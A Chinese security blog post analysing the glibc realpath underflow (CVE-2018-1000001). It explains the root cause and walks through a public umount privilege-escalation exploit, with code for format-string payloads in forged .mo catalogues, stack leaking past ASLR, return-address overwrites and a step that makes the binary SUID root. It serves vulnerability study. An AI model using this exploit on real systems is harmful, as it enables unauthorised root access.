CVE-2018-1000001 glibc realpath缓冲区溢出漏洞分析

houjingyi 看雪学院 2019-05-26

今年年初的一个漏洞，当时没有看懂就回家过年了，这几天决定把这个漏洞弄懂。表述不当的地方，还望批评指正。

漏洞原理

首先要理解realpath函数的含义。realpath展开所有符号链接并解析path指定的以null结尾的路径名中的/./和/../以生成规范化的绝对路径名。

生成的路径名以null结尾存储在由 resolve_path 指向的缓冲区中。生成的路径名将没有符号链接，/./或/../。比如/home/root目录下有一个1.txt，那么在 /home/root/11/22 目录下调用realpath("../../1.txt",resolved_path)得到的resolved_path 就是 /home/root/1.txt。

char *realpath(const char *path, char *resolved_path);

realpath的实现细节如下(glibc-2.24\stdlib\canonicalize.c)。首先判断path是相对路径还是绝对路径，如果第一个字符是”/”说明是绝对路径，否则是相对路径。是相对路径的话调用getcwd获得当前目录的绝对路径，后面结合path中的信息生成绝对路径名(就像上面举的例子)。在程序员的眼中，不管path是相对路径还是绝对路径，最后rpath第一个字符都是”/”，一定是绝对路径。

if (name[0] != '/')
    {
      if (!__getcwd (rpath, path_max))
    {
      rpath[0] = '\0';
      goto error;
    }
      dest = __rawmemchr (rpath, '\0');
    }
  else
    {
      rpath[0] = '/';
      dest = rpath + 1;
    }

接下来就是for循环以”/”为分割分别对path的每个部分进行处理，end - start == 1 && start[0] == '.' 就是”./”的情况，表示当前目录，所以不需要处理；end - start == 2 && start[0] == '.' && start[1] == '.'就是”../”的情况，表示上级目录，rpath和dest分别是getcwd获得的绝对路径的开头和结尾，那么这个时候就把dest向前挪直到遇到”/”，前面例子中/home/root/11/22向前挪两次为/home/root/。

for (start = end = name; *start; start = end)
    {
      struct stat64 st;
      int n;
 
      /* Skip sequence of multiple path-separators.  */
      while (*start == '/')
    ++start;
 
      /* Find end of path component.  */
      for (end = start; *end && *end != '/'; ++end)
    /* Nothing.  */;
 
      if (end - start == 0)
    break;
      else if (end - start == 1 && start[0] == '.')
    /* nothing */;
      else if (end - start == 2 && start[0] == '.' && start[1] == '.')
    {
      /* Back up to previous component, ignore if at root already.  */
      if (dest > rpath + 1)
        while ((--dest)[-1] != '/');
    }
      else
    {

如果不是这两种情况，那么会拷贝path的这个部分到dest，前面例子中把1.txt拷贝到/home/root/后面就得到/home/root/1.txt了。

 dest = __mempcpy (dest, start, end - start);
  *dest = '\0';

还会检查此时rpath是不是一个符号链接，如果是的话要展开。

if (S_ISLNK (st.st_mode))
    {
      ……
      n = __readlink (rpath, buf, path_max - 1);
      ……
      /* Careful here, end may be a pointer into extra_buf... */
      memmove (&extra_buf[n], end, len + 1);
      name = end = memcpy (extra_buf, buf, n);

本来代码是没有任何问题的，但是Linux内核修订了getcwd，当目录不可达时，会在返回的字符串前面加上(unreachable)。glibc没有进行相应的改动，仍然假设getcwd将返回绝对地址，所以在realpath中仅仅依靠name[0] != '/'就断定参数是一个相对路径，而忽略了以”(“开头的不可达路径。这样在for循环中处理”../”这种情况时向前挪dest，因为前面没有”/”了，所以一直--dest造成后面拷贝时缓冲区溢出。

漏洞利用

POC

作者给了一个DOS的POC，测试的环境是Debian Stretch amd64&libc6 2.24-11+deb9u1&util-linux-2.29.2-1，我刚好有这么一个环境，测试的效果如下(等一会儿就关机了)。

我们看看这个DOS的POC原理是什么。

触发漏洞使用的是util-linux中的umount，原因主要有两点：

1、 umount会调用realpath来解析路径，而且能被所有用户使用；

2、umount具有SUID权限，具有这种权限的文件会在执行时使调用者暂时获得该文件拥有者的权限，可以用来提权。umount的realpath的操作发生在堆上，所以需要创造可重现的堆布局。

在POC中是通过移除可能造成干扰的环境变量，仅保留locale做到的。locale在glibc或者其它需要本地化的程序和库中被用来解析文本(如时间、日期等)，它会在umount参数解析之前进行初始化，所以会影响到堆的结构和位于realpath缓冲区前面的那些低地址的内容。

在标准系统中，libc提供了/usr/lib/locale/C.UTF-8，它通过环境变量LC_ALL=C.UTF-8进行加载。在POC中向(unreachable)/tmp/from_archive/C/LC_MESSAGES/util-linux.mo文件写入了一些内容，将命令行中的文本base64解码再解压缩即可得到其内容。

po是portable object的缩写，mo是machine object的缩写。po文件是面向翻译人员提取于源代码的一种资源文件。当软件升级的时候，通过使用gettext软件包处理po文件，可以在一定程度上使翻译成果得以继承，减轻翻译人员的负担。

mo文件是面向计算机由po文件通过gettext软件包编译而成的二进制文件。程序通过读取mo文件使自身的界面转换成用户使用的语言。在这个网站可以直接下载windows系统上编译好的gettext，用bin目录中的msgunfmt.exe在命令行中将mo文件转成po文件。

msgunfmt.exe xxx.mo -o xxx.po

msgid表示的是代码中原本的文本，msgstr表示翻译的结果，也就是说遇到"%s: not mounted"会被替换成"AA%6$lnlnAAAAAAAAAAA"，调试的时候会看到。下面就在gdb中开始调试来更好理解POC的含义，首先还是确认glibc和util-linux的版本。

系统自带的umount是没有符号的，所以重新下载并编译。

sudo apt-get install dpkg-dev automake
sudo apt-get source util-linux
cd util-linux-2.29.2
./configure
make && sudo make install

注意在gdb中通过set env和set arg设置环境变量和参数。

因为(unreachable)没有”/”，所以--dest一直向前越过(unreachable)直到C.utf8/LC_CTYPE这里覆写”/”之后的LC_CTYPE。

第一次__mempcpy的结果：

struct libmnt_context
{
        int     action;         /* MNT_ACT_{MOUNT,UMOUNT} */
        int     restricted;     /* root or not? */
 
        char    *fstype_pattern;        /* for mnt_match_fstype() */
        char    *optstr_pattern;        /* for mnt_match_options() */
...

第二次__mempcpy的结果：

第三次__mempcpy的结果：

realpath返回(unreachable)/x：

之后umount_one->mk_exit_code->warnx(_("%s: not mounted"), tgt)：

在调用warnx之前先调用了gettext，原本的”%s: not mounted”被替换成"AA%6$lnlnAAAAAAAAAAA"：

使用fprintf的%n格式化字符串，即可对一些内存地址进行写操作。由于fprintf所使用的堆栈布局是固定的，所以可以忽略ASLR的影响。于是我们就可以利用该特性覆盖掉libmnt_context结构体中的restricted字段。

struct libmnt_context
{
        int     action;         /* MNT_ACT_{MOUNT,UMOUNT} */
        int     restricted;     /* root or not? */
 
        char    *fstype_pattern;        /* for mnt_match_fstype() */
        char    *optstr_pattern;        /* for mnt_match_options() */
...

在安装文件系统时，挂载点目录的原始内容会被隐藏起来并且不可用直到被卸载。但是，挂载点目录的所有者和权限没有被隐藏，其中restricted标志用于限制对挂载文件系统的访问。如果将该值覆盖，umount会误以为挂载是从root开始的。于是可以通过卸载root文件系统实现DoS。

EXP

理解了这个POC的原理之后再看看提权的EXP，其实思路是一样的。在代码中除了一些辅助函数之外主要分成了两个部分，第一部分 prepareNamespacedProcess 做了一些准备工作，第二部分 attemptEscalation 触发漏洞提权。

正常编译运行能够完美提权：

一旦在gdb中运行就卡在这里了：

这个问题让我蒙b了很长时间。查了半天资料才搞清楚原来只有当调试器以root权限运行时才可以调试setuid或setgid程序，内核不允许对有额外权限运行的程序调用ptrace。如果以root权限运行gdb，虽然能够运行被调试的程序，但是只能观察它在root下的行为。如果需要在程序没有被root启动的时候调试它，那么需要在gdb之外启动这个程序，然后再把程序附加到gdb中。

prepareNamespacedProcess 中主要做了下面这些事情。

1.通过设置setgroups为deny限制在新namespace里面调用setgroups来设置groups；通过设置uid_map和gid_map让子进程设置好挂载点。

char idMapFileName[128];
    char idMapData[128];
    sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
    int setGroupsFd=open(idMapFileName, O_WRONLY);
    assert(setGroupsFd>=0);
    int result=write(setGroupsFd, "deny", 4);
    assert(result>0);
    close(setGroupsFd);
 
    sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
    int uidMapFd=open(idMapFileName, O_WRONLY);
    assert(uidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getuid());
    result=write(uidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(uidMapFd);
 
    sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
    int gidMapFd=open(idMapFileName, O_WRONLY);
    assert(gidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getgid());
    result=write(gidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(gidMapFd);

2.创建了下面这些目录和文件。

// Create directories needed for umount to proceed to final state
// "not mounted".
  createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);

3.创建../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A 到 /proc/5600/cwd/(unreachable)/tmp/down 的符号链接用来触发溢出。

// Create symlink to trigger underflows.
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  result=symlink(osReleaseExploitData[1], pathBuffer);
  assert(!result||(errno==EEXIST));

4.创建/proc/5600/cwd/DATEMSK并向其中写入shebang(即“#!”)加上漏洞利用程序的路径，getdate会使用环境变量DATEMSK定义的路径名中的格式，会在下一个部分中用到它。

// getdate will leave that string in rdi to become the filename
// to execute for the next round.
  char *selfPathName=realpath("/proc/self/exe", NULL);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
  assert(handle>0);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
      selfPathName);
  assert(result<PATH_MAX);
  result=write(handle, pathBuffer, result);
  close(handle);
  free(selfPathName);

5.创建 /proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/C.UTF-8/LC_MESSAGES/util-linux.mo 并向其中写入需要的数据。

// Write the initial message catalogue to trigger stack dumping
// and to make the "umount" call privileged by toggling the "restricted"
// flag in the context.
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);
 
  char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
  assert(stackDumpStr);
  char *stackDumpStrEnd=stackDumpStr;
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
      ((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
  for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
    memcpy(stackDumpStrEnd, "%016lx", 6);
    stackDumpStrEnd+=6;
  }
// We wrote allready 8 bytes, write so many more to produce a
// count of 'L' and write that to the stack. As all writes so
// sum up to a count aligned by 8, and 'L'==0x4c, we will have
// to write at least 4 bytes, which is longer than any "%hhx"
// format string output. Hence do not care about the byte content
// here. The target write address has a 16 byte alignment due
// to varg structure.
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
      ('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
      STACK_LONG_DUMP_BYTES/16);
  *stackDumpStrEnd=0;
  result=writeMessageCatalogue(pathBuffer,
      (char*[]){
          "%s: mountpoint not found",
          "%s: not mounted",
          "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
      },
      (char*[]){"1234", stackDumpStr, "5678"},
      3);
  assert(!result);
  free(stackDumpStr);

转成po文件之后查看内容如下。

6.创建/proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/X.X/LC_MESSAGES/util-linux.mo。

result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
  assert((!result)||(errno==EEXIST));
  secondPhaseTriggerPipePathname=strdup(pathBuffer);
 
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  secondPhaseCataloguePathname=strdup(pathBuffer);
 
  free(namespaceMountBaseDir);
  return(namespacedProcessPid);

attemptEscalation中主要做了下面这些事情。

1.在fork的子进程中设置大量AANGUAGE = X.X环境变量喷射栈，umount调用realpath发生溢出时加载了前面设置的mo文件，格式化字符串把栈dump到stderr，修改restricted标志位并把AANGUAGE = X.X改成LANGUAGE = XX。

2.父进程分为下面几个阶段：

第零阶段寻找溢出后的8个A定位数据的位置。

case 0: // Initial sync: read A*8 preamble.
          if(readDataLength<8)
            continue;
          char *preambleStart=memmem(readBuffer, readDataLength,
              "AAAAAAAA", 8);
          if(!preambleStart) {
// No preamble, move content only if buffer is full.
            if(readDataLength==sizeof(readBuffer))
              moveLength=readDataLength-7;
            break;
          }
// We found, what we are looking for. Start reading the stack.
          escalationPhase++;
          moveLength=preambleStart-readBuffer+8;

第一阶段读取栈上的数据绕过ASLR，找到libc基地址后将返回地址改成getdate和execl的地址，然后把这些信息写入/proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/X.X/LC_MESSAGES/util-linux.mo。

case 1: // Read the stack.
// Consume stack data until or local array is full.
          while(moveLength+16<=readDataLength) {
            result=sscanf(readBuffer+moveLength, "%016lx",
                (int*)(stackData+stackDataBytes));
            if(result!=1) {
// Scanning failed, the data injection procedure apparently did
// not work, so this escalation failed.
              goto attemptEscalationCleanup;
            }
            moveLength+=sizeof(long)*2;
            stackDataBytes+=sizeof(long);
// See if we reached end of stack dump already.
            if(stackDataBytes==sizeof(stackData))
              break;
          }
          if(stackDataBytes!=sizeof(stackData))
            break;
 
// All data read, use it to prepare the content for the next phase.
          fprintf(stderr, "Stack content received, calculating next phase\n");
 
          int *exploitOffsets=(int*)osReleaseExploitData[3];
 
// This is the address, where source Pointer is pointing to.
          void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
// This is the stack address source for the target pointer.
          void *sourcePointerLocation=sourcePointerTarget-0xd0;
 
          void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
// This is the stack address of the libc start function return
// pointer.
          void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
          fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
              sourcePointerLocation, sourcePointerTarget,
              targetPointerTarget, libcStartFunctionReturnAddressSource);
// So the libcStartFunctionReturnAddressSource is the lowest address
// to manipulate, targetPointerTarget+...
 
          void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
          void *stackWriteData[]={
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
          };
          fprintf(stderr, "Changing return address from %p to %p, %p\n",
              libcStartFunctionAddress, stackWriteData[0],
              stackWriteData[1]);
          escalationPhase++;
 
          char *escalationString=(char*)malloc(1024);
          createStackWriteFormatString(
              escalationString, 1024,
              exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
              sourcePointerTarget, // Base value to write
              exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
              libcStartFunctionReturnAddressSource,
              (unsigned short*)stackWriteData,
              sizeof(stackWriteData)/sizeof(unsigned short)
          );
          fprintf(stderr, "Using escalation string %s", escalationString);
 
          result=writeMessageCatalogue(
              secondPhaseCataloguePathname,
              (char*[]){
                  "%s: mountpoint not found",
                  "%s: not mounted",
                  "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
              },
              (char*[]){
                  escalationString,
                  "BBBB5678%3$s\n",
                  "BBBBABCD%s\n"},
              3);
          assert(!result);
          break;

转成po文件之后查看内容如下。

第二阶段因为LANGUAGE改变了所以会重新读取util-linux.mo，等待管道进入非阻塞模式再进入下一个阶段。

if(escalationPhase==2) {
// We cannot use the standard poll from below to monitor the pipe,
// but also we do not want to block forever. Wait for the pipe
// in nonblocking mode and then continue with next phase.
      result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
      if(result) {
        goto attemptEscalationCleanup;
      }
      escalationPhase++;
    }

第三阶段读取umount输出(代码里面的注释写的是“result from mount”，应该是笔误把umount写成mount了)，进行一些清理工作，等待进入ROP链。

case 3:
// Wait for pipe connection and output any result from mount.
          readDataLength=0;
          break;

attemptEscalationCleanup:
// Wait some time to avoid killing umount even when exploit was
// successful.
  sleep(1);
  close(childStdout);
// It is safe to kill the child as we did not wait for it to finish
// yet, so at least the zombie process is still here.
  kill(childPid, SIGKILL);
  pid_t waitedPid=waitpid(childPid, NULL, 0);
  assert(waitedPid==childPid);
 
  return(escalationSuccess);

前面 prepareNamespacedProcess 中在 DATEMSK 定义的路径名中写入shebang(即“#!”)加上漏洞利用程序的路径，操作系统会调用漏洞利用程序作为解释器。漏洞利用程序将自己的文件所有权和模式更改为root SUID二进制文件并退出。

if(geteuid()==0) {
    struct stat statBuf;
    int result=stat("/proc/self/exe", &statBuf);
    assert(!result);
    if(statBuf.st_uid||statBuf.st_gid) {
      fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
          programmName);
      int handle=open("/proc/self/exe", O_RDONLY);
      fchown(handle, 0, 0);
      fchmod(handle, 04755);
      exit(0);
    }

umount进程退出之后在主进程中做一些清理工作就可以直接调用shell了，成功提权！

参考资料

1. LibcRealpathBufferUnderflow

2. glibc Realpath缓冲区下溢漏洞(CVE–2018–1000001)分析

本文由看雪论坛 chpeagle 原创

转载请注明来自看雪社区

扫描二维码关注我们，更多干货等你来拿！

戳原文，峰会精彩立即看！

二湘：朱令去世一周年，清华学子控诉清华在朱令案中的冷血和无耻

“四川大学姜涛与爱人程月玲”，你们现在还好吗？

为了这部描述从“反右”到“文革”的禁片，田壮壮付出了十年不能拍片的代价

关于字节基建

李宜雪的良知卖了2万元，真正需要声援的是罗灿宏啊